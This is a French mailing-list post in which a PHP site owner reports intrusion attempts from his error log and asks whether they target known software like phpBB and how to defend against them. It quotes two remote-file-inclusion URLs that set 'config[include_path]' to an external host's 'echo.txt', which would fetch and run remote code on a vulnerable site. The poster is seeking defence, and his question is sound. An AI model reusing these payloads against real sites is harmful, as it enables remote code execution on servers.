Bonjour, Sur mon site en PHP, je repère des tentatives d'intrusion / prise de contrôle / récupération de données sensibles. Elles n'ont pas l'air efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un log d'erreur), et se font par massage de paramètres. Exemple : http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? ou même : http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? Comme je n'ai pas de page config_settings.php et que mes pages ne prennent pas les paramètres de cette manière, ça ne marche pas... o_O Pour voir le contenu du script que l'attaquant essaie de faire tourner, voyez ce fichier texte : http://www.health-nutrition-business.com/echo.txt
La question que je me pose : ces attaques sont-elles conçus pour des programmes PHP connus (par exemple phpBB), ou bien peuvent-elles fonctionner sur du code maison ? Comment s'en prémunir ? Merci Yann -- _________________________________________________________________ Kaella, distribution Linux live-cd : http://kaella.linux-azur.org Diffusez cette liste aupres de vos relations :) Linux Azur : http://linux-azur.org L'auteur du post est responsable de ses écrits ! *** Pas de message SMS, HTML ni de PJ SVP ***
